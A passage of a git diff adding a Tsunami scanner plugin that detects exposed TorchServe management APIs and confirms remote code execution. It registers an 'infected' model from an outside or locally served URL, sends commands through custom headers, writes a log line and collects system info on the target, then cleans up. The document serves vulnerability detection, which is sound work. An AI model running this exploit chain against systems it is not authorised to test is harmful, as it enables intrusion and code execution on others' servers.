logger.atFine().log("BASIC MODE"); + // It looks like TorchServe management API, but we can't exploit it as callback + // functionality has not been enabled + logger.atInfo().log("Callback verification is not enabled, skipping exploit"); + return this.details; + case SSRF: + logger.atFine().log("SSRF MODE"); + // Set the model URL to the Tsunami callback server, consider any callback as a confirmation + executeExploit(targetUrl, getTsunamiCallbackUrl(), modelName); + return checkTsunamiCallbackUrl() ? this.details : null; + case STATIC: + logger.atFine().log("STATIC MODE"); + // Use the provided URL as a model source, confirm code execution directly + url = this.details.staticUrl; + break; + case LOCAL: + logger.atFine().log("LOCAL MODE"); + // Serve the model locally, confirm code execution directly + url = serveExploitFile(modelName); + break; + default: + throw new IllegalArgumentException("Invalid mode: " + this.details.exploitationMode); + } + + // Common verification for STATIC and LOCAL + + executeExploit(targetUrl, url, modelName); + + // 1. Was the model added to the list of models? + // if (!getModelNames(targetUrl).contains(modelName)) return null; + if (!modelExists(targetUrl, modelName)) return null; + + // 2. Can we simulate code execution (hash + callback)? + if (!verifyExploit(targetUrl, modelName)) return null; + + // Report confirmed vulnerability + return this.details; + } + + /** Verifies that the model was added to the list of models on the target. */ + private boolean modelExists(HttpUrl targetUrl, String modelName) throws IOException { + HttpUrl url = targetUrl.newBuilder().addPathSegment("models").addPathSegment(modelName).build(); + JsonElement response = sendHttpRequestGetJson(HttpMethod.GET, url, null); + return response != null; + } + + /** + * Verifies if the exploit was successful on the target server. + * + *

This method simulates code execution through hash calculation and, if enabled, through + * Tsunami's callback server. It also logs and collects system info from the target. + * + * @param targetUrl The URL of the target server. + * @param modelName The name of the model used in the exploit. + * @return True if the exploit is verified successfully, false otherwise. + * @throws IOException If an I/O error occurs during the verification process. + */ + private boolean verifyExploit(HttpUrl targetUrl, String modelName) throws IOException { + boolean verified = false; + + // Simulate code execution through a hash calculation + String randomValue = randomUtils.getRandomValue(); + String hashReceived = interact(targetUrl, modelName, "tsunami-execute", randomValue); + this.details.hashVerification = randomUtils.validateHash(hashReceived, randomValue); + verified = this.details.hashVerification; + + // Simulate code execution through Tsunami's callback server + if (this.payloadGenerator.isCallbackServerEnabled()) { + String callbackUrl = getTsunamiCallbackUrl(); + interact(targetUrl, modelName, "tsunami-callback", callbackUrl); + verified |= checkTsunamiCallbackUrl(); + } + + // One of the verification methods must succeed for the exploit to be confirmed + if (!verified) return false; + + // generate the log file entry on the remote server and collect system info + // generate the log message by adding a timestamp to the template + this.details.messageLogged = String.format(Details.LOG_MESSAGE, Instant.now().toString()); + interact(targetUrl, modelName, "tsunami-log", this.details.messageLogged); + this.details.systemInfo = interact(targetUrl, modelName, "tsunami-info", "True"); + + return true; + } + + private boolean compareHash(String randomValue, String hash) { + try { + MessageDigest md = MessageDigest.getInstance("MD5"); + byte[] digest = md.digest(randomValue.getBytes()); + String expectedHash = String.format("%032x", new java.math.BigInteger(1, digest)); + return expectedHash.equals(hash); + } catch (java.security.NoSuchAlgorithmException e) { + return false; + } + } + + /** + * Sends an HTTP request to interact with a specific model on the TorchServe server. + * + *

This method communicates with the TorchServe model via the Management API, utilizing the + * 'customized=true' query parameter to bypass the need for locating the Inference API. It sends a + * request with custom headers and extracts the response from the 'customizedMetadata' field. + * + *

Note: This approach is used to directly interact with the model through Management API, + * avoiding issues with locating the Inference API which may be on a different port or not + * exposed. + * + * @param targetUrl The base URL of the TorchServe Management API. + * @param modelName The name of the model to interact with. + * @param headerName The name of the header to send in the request. + * @param headerValue The value of the header to send in the request. + * @return The response extracted from 'customizedMetadata' field, or null if an error occurs. + * @throws IOException If an I/O error occurs during the HTTP request. + */ + private @Nullable String interact( + HttpUrl targetUrl, String modelName, String headerName, String headerValue) + throws IOException { + // Generally in order to talk to a model we need to use an Inference API (default port: 8080) + // which is separate + // from the Management API (default port: 8081). However, there is a way to hit the model even + // through Management + // API by adding the "customized=true" query parameter to the request, as documented here: + // + // https://pytorch.org/serve/management_api.html#:~:text=customized=true + // + // We're using this trick to send a request to the model in order to avoid the need to locate + // the Inference API + // (which might be remapped to an arbitrary port or not exposed at all). + // With this approach, the actual payload is passed through `tsunami-*` headers and responses + // are placed to the + // "customizedMetadata" field of the response. + // + // Look at model.py for the supported headers and their meaning. + // + // $ curl http://torchserve-081:8081/models/somerandomname?customized=true \ + // -H 'tsunami-header: ' + // [ + // { + // "modelName": "somerandomname", + // "modelVersion": "1.0", + // "modelUrl": "https://s3.amazonaws.com/model.mar", + // "runtime": "python", + // "minWorkers": 1, + // "maxWorkers": 1, + // "batchSize": 1, + // "maxBatchDelay": 100, + // "loadedAtStartup": false, + // "workers": [ + // { + // "id": "9029", + // "startTime": "2023-12-18T22:50:13.994Z", + // "status": "READY", + // "memoryUsage": 227737600, + // "pid": 1719, + // "gpu": false, + // "gpuUsage": "N/A" + // } + // ], + // "customizedMetadata": "" + // } + // ] + HttpHeaders header = HttpHeaders.builder().addHeader(headerName, headerValue).build(); + HttpUrl url = + targetUrl + .newBuilder() + .addPathSegment("models") + .addPathSegment(modelName) + .addQueryParameter("customized", "true") + .build(); + + try { + JsonObject response = + sendHttpRequestGetJsonArray(HttpMethod.GET, url, header).get(0).getAsJsonObject(); + String result = response.get("customizedMetadata").getAsString(); + return result; + } catch (NullPointerException | ClassCastException e) { + return null; + } + } + + /** + * Constructs the target URL for a given network service. + * + *

This method builds the root URL for a web application based on the provided network service + * details, typically used as the base URL for further API interactions. + * + * @param service The network service for which the URL is being constructed. + * @return The constructed HttpUrl object for the network service. + */ + private HttpUrl buildTargetUrl(NetworkService service) { + return HttpUrl.parse(NetworkServiceUtils.buildWebApplicationRootUrl(service)); + } + + /** + * Generates a callback URL for Tsunami's payload generator. + * + *

This method configures and generates a payload for Tsunami's callback server, typically used + * in SSRF vulnerability testing. The callback URL is used to verify if an external interaction + * with the Tsunami server occurs, indicating a successful SSRF exploit. + * + * @return The generated callback URL for the Tsunami payload. + */ + private String getTsunamiCallbackUrl() { + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY) + .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY) + .build(); + this.payload = this.payloadGenerator.generate(config); + return this.payload.getPayload(); + } + + private boolean checkTsunamiCallbackUrl() { + this.details.callbackVerification = this.payload != null && this.payload.checkIfExecuted(); + return this.details.callbackVerification; + } + + /** + * Checks whether the specified target URL corresponds to a TorchServe management API. + * + *

This method sends a GET request to the target URL to retrieve the API description. It then + * checks if the response matches the expected signature of a TorchServe management API. + * + * @param targetUrl The URL of the target service to be checked. + * @return True if the target URL is a TorchServe management API, false otherwise. + * @throws IOException If a network error occurs during the HTTP request. + */ + private boolean isTorchServe(HttpUrl targetUrl) throws IOException { + try { + JsonObject response = + sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "api-description"); + return response != null && isTorchServeResponse(response); + } catch (IOException e) { + logger.atSevere().withCause(e).log("Error checking if target is TorchServe"); + throw e; + } + } + + /** + * Determines if the given response matches the expected signature of a TorchServe API. + * + *

Analyzes the JSON structure of the response to verify if it contains key elements that match + * the TorchServe API's characteristics, such as the API title and the presence of specific + * operation IDs. + * + * @param response The JSON object representing the HTTP response to analyze. + * @return True if the response matches the expected TorchServe signature, false otherwise. + */ + private boolean isTorchServeResponse(JsonObject response) { + // Expected JSON structure + // { + // "openapi": "3.0.1", + // "info": { + // "title": "TorchServe APIs", + // "description": "TorchServe is a flexible and easy to use tool for serving deep learning + // models", + // "version": "0.8.1" + // }, + // "paths": { + // "/models": { + // "post": { + // "description": "Register a new model in TorchServe.", + // "operationId": "registerModel", + String apiTitle = getNestedKey(response, "info", "title"); + String registerModel = getNestedKey(response, "paths", "/models", "post", "operationId"); + + return response.has("openapi") + && apiTitle != null + && apiTitle.equals("TorchServe APIs") + && registerModel != null + && registerModel.equals("registerModel"); + } + + /** + * Retrieves a nested key value from a JSON object. + * + *

This method navigates through a JSON object using a sequence of keys to retrieve the final + * value. It is primarily used for extracting specific data from complex JSON structures. + * + * @param object The JSON object from which to extract the value. + * @param keys A sequence of keys used to navigate to the desired value in the JSON object. + * @return The string value of the nested key, or null if the key does not exist or is not a + * string. + */ + private @Nullable String getNestedKey(JsonObject object, String... keys) { + try { + // Traverse the JSON object until the last key - expect JsonObject at every step + for (int i = 0; i < keys.length - 1; i++) { + object = object.getAsJsonObject(keys[i]); + } + + // Return the value of the last key - expect it to be a String + return object.get(keys[keys.length - 1]).getAsString(); + } catch (NullPointerException | ClassCastException e) { + return null; + } + } + + /** + * Generates a unique model name that does not already exist on the target TorchServe server. + * + *

This method retrieves a list of existing model names from the target server and generates a + * new, random model name that is not in that list. + * + * @param targetUrl The URL of the TorchServe server to check for existing model names. + * @return A unique model name. + * @throws IOException If a network error occurs during the HTTP request. + */ + private String getModelName(HttpUrl targetUrl) throws IOException { + // get the list of models from the target + List models = getModelNames(targetUrl); + this.details.models = models; + + return generateRandomModelName(models); + } + + /** + * Generates a random model name that is not present in the provided list of existing models. + * + *

This method generates a random string and ensures that this string is not already used as a + * model name on the target server. + * + * @param existingModels A list of model names that already exist on the server. + * @return A randomly generated, unique model name. + */ + private String generateRandomModelName(List existingModels) { + String modelName; + do { + modelName = randomUtils.getRandomValue(); + } while (existingModels.contains(modelName)); + return modelName; + } + + /** + * Retrieves a list of model names from the TorchServe server. + * + *

Sends a GET request to the target server's API to fetch the list of currently loaded models. + * Note: Handles pagination to retrieve all models if more than the default page limit. + * + * @param targetUrl The URL of the TorchServe server. + * @return A list of model names present on the server. + * @throws IOException If a network error occurs during the HTTP request. + */ + private List getModelNames(HttpUrl targetUrl) throws IOException { + // get the list of models from the target + List models = new ArrayList<>(); + JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models"); + if (response == null) return models; + + // TODO: there's pagination with default limit of 100 models per page + // https://github.com/pytorch/serve/blob/master/docs/management_api.md#list-models + // + // Expected JSON structure: + // "models": [ + // { + // "modelName": "squeezenet1_1", + // "modelUrl": "https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar" + // }, + + try { + JsonArray modelsArray = response.getAsJsonArray("models"); + for (JsonElement model : modelsArray) { + models.add(model.getAsJsonObject().get("modelName").getAsString()); + } + } catch (NullPointerException | ClassCastException e) { + // No models found, we'll return an empty list + } + return models; + } + + /** + * Removes a model from the TorchServe server by its name. + * + *

This method sends a DELETE request to the server's API to remove a model specified by its + * name. + * + * @param targetUrl The URL of the TorchServe server. + * @param modelName The name of the model to be removed. + * @throws IOException If a network error occurs during the HTTP request. + */ + private void removeModelByName(HttpUrl targetUrl, String modelName) throws IOException { + sendHttpRequestGetJsonObject(HttpMethod.DELETE, targetUrl, "models", modelName); + } + + /** + * Removes a model from the TorchServe server by its URL. + * + *

Retrieves the list of models from the server and searches for a model with the specified + * URL. If found, it uses the model's name to remove it from the server. + * + * @param targetUrl The URL of the TorchServe server. + * @param url The URL of the model to be removed. + */ + private void removeModelByUrl(HttpUrl targetUrl, String url) { + try { + // Get the list of models from the target + JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models"); + + // Look for the model with the specified URL and remove it + JsonArray modelsArray = response.getAsJsonArray("models"); + for (JsonElement model : modelsArray) { + JsonObject modelObject = model.getAsJsonObject(); + if (modelObject.get("modelUrl").getAsString().equals(url)) { + String modelName = modelObject.get("modelName").getAsString(); + removeModelByName(targetUrl, modelName); + } + } + } catch (NullPointerException | ClassCastException | IOException e) { + // No models, nothing to remove + } + } + + /** + * Starts the web server and serves the exploit file. + * + *

This method initiates the web server bound to a specified host and port, and serves an + * exploit file located at a given URL. It is used in LOCAL exploitation mode to host the exploit + * payload. + * + * @param modelName The name of the model to be used in the exploit file's name. + * @return The URL where the exploit file is served. + * @throws IOException If an error occurs while starting the web server. + */ + private String serveExploitFile(String modelName) throws IOException { + this.webServer.start(this.details.localBindHost, this.details.localBindPort); + HttpUrl baseUrl = + HttpUrl.parse(this.details.localAccessibleUrl) + .newBuilder() + .addPathSegment(modelName + ".mar") + .build(); + return baseUrl.toString(); + } + + /** + * Executes the exploit against the target TorchServe service. + * + *

Constructs and sends an HTTP POST request to add a new model to the TorchServe service. The + * response is analyzed to determine if the model registration was successful, indicating a + * potential exploit. + * + * @param targetUrl The URL of the target TorchServe service. + * @param exploitUrl The URL of the exploit payload. + * @param modelName The name of the model to register. + * @return True if the exploit execution led to successful model registration, false otherwise. + * @throws IOException If a network error occurs during the HTTP request. + */ + private boolean executeExploit(HttpUrl targetUrl, String exploitUrl, String modelName) + throws IOException { + HttpUrl url = + targetUrl + .newBuilder() + .addPathSegment("models") + .addEncodedQueryParameter("url", exploitUrl) + .addQueryParameter("batch_size", "1") + .addQueryParameter("initial_workers", "1") + .addQueryParameter("synchronous", "true") + .addQueryParameter("model_name", modelName) + .build(); + this.details.targetUrl = targetUrl.toString(); + this.details.exploitUrl = exploitUrl; + + // Remove any existing models with the same URL + removeModelByUrl(targetUrl, exploitUrl); + + JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.POST, url); + if (response == null) return false; + + // Expected response (200): + // + // { "status": "Model \"squeezenet1_1\" Version: 1.0 registered with 1 initial workers" } + // + // Expected response (500): + // { + // "code": 500, + // "type": "InternalServerException", + // "message": "Model file already exists squeezenet1_1.mar" + // } + String message = getNestedKey(response, "status"); + if (message == null) return false; + + return message.contains("registered with 1 initial workers"); + } + + /** + * Performs cleanup operations after exploit execution. + * + *

This method removes the added model from the TorchServe service and stops the web server. It + * is essential for reverting changes made during the exploitation process to maintain a clean + * state. + */ + private void cleanupExploit() { + if (this.details.modelName == null || this.details.targetUrl == null) return; + + try { + removeModelByName(HttpUrl.parse(this.details.targetUrl), this.details.modelName); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to cleanup exploit"); + this.details.cleanupFailed = true; + } + + this.webServer.stop(); + } + + /** + * Sends an HTTP request and returns the response as a JsonObject. + * + * @param method The HTTP method to use for the request. + * @param baseUrl The base URL for the request. + * @param pathSegments Additional path segments to append to the base URL. + * @return The response as a JsonObject, or null if the response is not a valid JSON object. + * @throws IOException If a network error occurs during the HTTP request. + */ + private @Nullable JsonObject sendHttpRequestGetJsonObject( + HttpMethod method, HttpUrl baseUrl, String... pathSegments) throws IOException { + return sendHttpRequestGetJson(method, baseUrl, null, pathSegments).getAsJsonObject(); + } + + /** + * Sends an HTTP request and returns the response as a JsonArray. + * + * @param method The HTTP method to use for the request. + * @param baseUrl The base URL for the request. + * @param headers The HTTP headers to include in the request. + * @param pathSegments Additional path segments to append to the base URL. + * @return The response as a JsonArray, or null if the response is not a valid JSON array. + * @throws IOException If a network error occurs during the HTTP request. + */ + private @Nullable JsonArray sendHttpRequestGetJsonArray( + HttpMethod method, HttpUrl baseUrl, HttpHeaders headers, String... pathSegments) + throws IOException { + return sendHttpRequestGetJson(method, baseUrl, headers, pathSegments).getAsJsonArray(); + } + + /** + * Sends an HTTP request and returns the response body as a JsonElement. + * + * @param method The HTTP method to use for the request. + * @param baseUrl The base URL for the request. + * @param headers The HTTP headers to include in the request. + * @param pathSegments Additional path segments to append to the base URL. + * @return The response body as a JsonElement, or null if the response body is not valid JSON. + * @throws IOException If a network error occurs during the HTTP request. + */ + private @Nullable JsonElement sendHttpRequestGetJson( + HttpMethod method, HttpUrl baseUrl, HttpHeaders headers, String... pathSegments) + throws IOException { + if (headers == null) { + headers = HttpHeaders.builder().build(); + } + + HttpUrl url = baseUrl; + if (pathSegments.length > 0) { + url = url.newBuilder().addPathSegments(String.join("/", pathSegments)).build(); + } + + HttpRequest request = + HttpRequest.builder().setHeaders(headers).setMethod(method).setUrl(url).build(); + HttpResponse response = this.httpClient.send(request); + + return response + .bodyJson() + .orElseThrow(() -> new IOException("Couldn't parse response body as JSON")); + } + + /** + * Pretty prints a JSON string. + * + *

Formats a given JSON string to a more readable form with proper indentation. If the input + * string is not valid JSON, it returns the original string. + * + * @param json The JSON string to be pretty printed. + * @return The pretty-printed version of the JSON string, or the original string if it's not valid + * JSON. + */ + private String prettyPrintJson(String json) { + try { + Gson gson = new GsonBuilder().setPrettyPrinting().create(); + JsonParser jp = new JsonParser(); + JsonElement je = jp.parse(json); + return gson.toJson(je); + } catch (JsonParseException e) { + return json; + } + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementAPIExploiterWebServer.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementAPIExploiterWebServer.java new file mode 100644 index 000000000..ea0d0e7eb --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementAPIExploiterWebServer.java @@ -0,0 +1,86 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.google.common.flogger.GoogleLogger; +import com.sun.net.httpserver.HttpExchange; +import com.sun.net.httpserver.HttpServer; +import java.io.IOException; +import java.io.InputStream; +import java.io.OutputStream; +import java.net.InetSocketAddress; + +public class TorchServeManagementAPIExploiterWebServer { + private HttpServer httpServer; + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + public void start(String hostname, int port) throws IOException { + try { + httpServer = HttpServer.create(new InetSocketAddress(hostname, port), 0); + httpServer.setExecutor(null); // sets the executor to null to use the default executor + httpServer.createContext("/", this::handleRequest); // creates a context with a handler + httpServer.start(); + logger.atInfo().log("Web server started on %s:%d", hostname, port); + } catch (IOException e) { + logger.atSevere().withCause(e).log("IO Exception starting web server"); + throw e; + } catch (Exception e) { + logger.atWarning().withCause(e).log("Error starting web server"); + throw e; + } + } + + private void handleRequest(HttpExchange exchange) throws IOException { + String requestMethod = exchange.getRequestMethod(); + logger.atInfo().log("Received %s request", requestMethod); + + if ("GET".equals(requestMethod)) { + serveModelFile(exchange); + } else { + logger.atWarning().log("Unsupported request method: %s", requestMethod); + exchange.sendResponseHeaders(405, -1); // Method Not Allowed + } + exchange.close(); + } + + private void serveModelFile(HttpExchange exchange) throws IOException { + try (InputStream is = getClass().getClassLoader().getResourceAsStream("model.mar")) { + if (is == null) { + logger.atSevere().log("Model file not found"); + exchange.sendResponseHeaders(404, -1); // Not Found + return; + } + + byte[] zipContent = is.readAllBytes(); + exchange.getResponseHeaders().add("Content-Type", "application/zip"); + exchange.sendResponseHeaders(200, zipContent.length); + + try (OutputStream os = exchange.getResponseBody()) { + os.write(zipContent); + } + } catch (IOException e) { + logger.atSevere().withCause(e).log("Error serving model file"); + exchange.sendResponseHeaders(500, -1); // Internal Server Error + } + } + + public void stop() { + if (httpServer != null) { + httpServer.stop(0); + logger.atInfo().log("Web server stopped"); + } + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiArgs.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiArgs.java new file mode 100644 index 000000000..6fb80c3ef --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiArgs.java @@ -0,0 +1,62 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.beust.jcommander.Parameter; +import com.beust.jcommander.Parameters; +import com.google.tsunami.common.cli.CliOption; + +@Parameters(separators = "=") +public class TorchServeManagementApiArgs implements CliOption { + // Default mode is SSRF, which uses regular Tsunami Callback server to confirm vulnerability. + // Note that it does not observe the code execution on the target directly. + @Parameter( + names = "--torchserve-management-api-mode", + description = + "Exploitation mode used to confirm vulnerability [auto (default), basic, ssrf, static," + + " local]") + public String exploitationMode; + + // Static mode requires an infected model to be hosted on a static URL. + @Parameter( + names = "--torchserve-management-api-model-static-url", + description = "Static URL of the infected model, to be added to TorchServe.") + public String staticUrl; + + // Local mode means the plugin will attempt to serve an infected model directly. Bind host + // and port indicate where plugin will bind the HTTP server to, accessible URL is the URL + // of the server from the outside. + @Parameter( + names = "--torchserve-management-api-local-bind-host", + description = "Path to the infected model, to be added to TorchServe.") + public String localBindHost; + + @Parameter( + names = "--torchserve-management-api-local-bind-port", + description = "Port to bind the local TorchServe instance to.") + public int localBindPort; + + @Parameter( + names = "--torchserve-management-api-local-accessible-url", + description = "URL of the local TorchServe instance accessible from the outside.") + public String localAccessibleUrl; + + @Override + public void validate() { + // Nothing to do here, because we need to merge the config with the CLI args and it cannot be + // done here. + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiConfig.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiConfig.java new file mode 100644 index 000000000..de4fbae12 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiConfig.java @@ -0,0 +1,34 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.google.tsunami.common.config.annotations.ConfigProperties; + +@ConfigProperties("plugins.doyensec.torchserve") +public class TorchServeManagementApiConfig { + // --torchserve-management-api-mode + public String exploitationMode = "auto"; + + // --torchserve-management-api-model-static-url + public String staticUrl; + + // --torchserve-management-api-local-bind-host + public String localBindHost; + // --torchserve-management-api-local-bind-port + public int localBindPort; + // --torchserve-management-api-local-accessible-url + public String localAccessibleUrl; +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetector.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetector.java new file mode 100644 index 000000000..ddf59db0e --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetector.java @@ -0,0 +1,174 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import static com.google.common.base.Preconditions.checkNotNull; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.proto.AdditionalDetail; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TextData; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.time.Clock; +import java.time.Instant; +import javax.inject.Inject; + +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "TorchServeManagementApiDetector", + version = "0.1", + description = "Detects publicly available TorchServe management API with a path to RCE.", + author = "Andrew Konstantinov (andrew@doyensec.com)", + bootstrapModule = TorchServeManagementApiDetectorBootstrapModule.class) +@ForWebService +public final class TorchServeManagementApiDetector implements VulnDetector { + private final TorchServeExploiter torchServeExploiter; + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + public static final String REPORT_PUBLISHER = "DOYENSEC"; + public static final String REPORT_ID = "TORCHSERVE_MANAGEMENT_API_RCE"; + public static final String REPORT_TITLE = "TorchServe Management API Remote Code Execution"; + public static final String REPORT_RECOMMENDATION = + "It is strongly recommended to restrict access to the TorchServe Management API, as " + + "public exposure poses significant security risks. The API allows potentially " + + "disruptive interactions with TorchServe, including modifying configurations, " + + "deleting models, and altering resource allocation, which could lead to Denial of " + + "Service (DoS) attacks. \n\n" + + "Particular attention should be given to the possibility of unauthorized code " + + "execution through model uploads. Users must ensure strict control over model " + + "creation to prevent unauthorized or malicious use. Implementing the 'allowed_urls' " + + "option in TorchServe's configuration is critical in this regard. This setting, " + + "detailed at https://pytorch.org/serve/configuration.html#:~:text=allowed_urls, " + + "limits the URLs from which models can be downloaded. \n\n" + + "It is essential to configure 'allowed_urls' as a comma-separated list of " + + "regular expressions that specifically allow only trusted sources. General " + + "whitelisting of large domains (such as entire AWS S3 or GCP buckets) is not " + + "secure. Care must be taken to ensure regex patterns are accurately defined " + + "(e.g., using 'https://models\\.my-domain\\.com/*' instead of " + + "'https://models.my-domain.com/*' to prevent unintended domain matches). \n\n" + + "Finally, be aware that the Management API discloses the original URLs of " + + "downloaded models. Attackers could exploit this information to identify " + + "vulnerable download sources or to host malicious models on similarly-named " + + "domains."; + private final Clock utcClock; + + @Inject + public TorchServeManagementApiDetector( + TorchServeExploiter torchServeExploiter, @UtcClock Clock utcClock) { + this.utcClock = checkNotNull(utcClock); + this.torchServeExploiter = checkNotNull(torchServeExploiter); + } + + /** + * Detects vulnerabilities in the given target. Called by Tsunami that handles the port scanning + * and service fingerprinting. + * + * @param targetInfo Information about the target system. + * @param matchedServices List of matched network services. + * @return A list of detection reports. + */ + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + DetectionReportList.Builder reportListBuilder = DetectionReportList.newBuilder(); + + for (NetworkService service : matchedServices) { + try { + TorchServeExploiter.Details details = torchServeExploiter.isServiceVulnerable(service); + logger.atInfo().log("Checking service %s", service); + if (details != null) { + logger.atInfo().log("Found vulnerable service %s", service); + DetectionReport report = buildDetectionReport(targetInfo, service, details); + reportListBuilder.addDetectionReports(report); + } + } catch (Exception e) { + logger.atWarning().withCause(e).log("Error processing service %s", service); + } + } + return reportListBuilder.build(); + } + + /** Builds a vulnerability object. */ + private Vulnerability buildVulnerability(TorchServeExploiter.Details details) { + VulnerabilityId vulnerabilityId = + VulnerabilityId.newBuilder().setPublisher(REPORT_PUBLISHER).setValue(REPORT_ID).build(); + return Vulnerability.newBuilder() + .setTitle(REPORT_TITLE) + .setDescription(details.generateDescription()) + .setRecommendation(REPORT_RECOMMENDATION) + .addAdditionalDetails( + AdditionalDetail.newBuilder() + .setDescription("Additional details") + .setTextData( + TextData.newBuilder().setText(details.generateAdditionalDetails()).build()) + .build()) + .setSeverity(details.getSeverity()) + .setMainId(vulnerabilityId) + .build(); + } + + /** + * Builds a detection report for a given target and service. + * + * @param targetInfo Information about the target. + * @param service The network service associated with the vulnerability. + * @return The constructed detection report. + */ + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService service, TorchServeExploiter.Details details) { + Vulnerability vulnerability = buildVulnerability(details); + return buildDetectionReport(targetInfo, service, vulnerability, details.isVerified()); + } + + /** + * Builds a detection report for a given target, service and vulnerability. + * + * @param targetInfo + * @param service + * @param vulnerability + * @return The constructed detection report. + */ + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, + NetworkService service, + Vulnerability vulnerability, + boolean verified) { + DetectionReport report = + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus( + verified + ? DetectionStatus.VULNERABILITY_VERIFIED + : DetectionStatus.VULNERABILITY_PRESENT) + .setVulnerability(vulnerability) + .build(); + return report; + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorBootstrapModule.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorBootstrapModule.java new file mode 100644 index 000000000..9141e1a78 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorBootstrapModule.java @@ -0,0 +1,27 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * 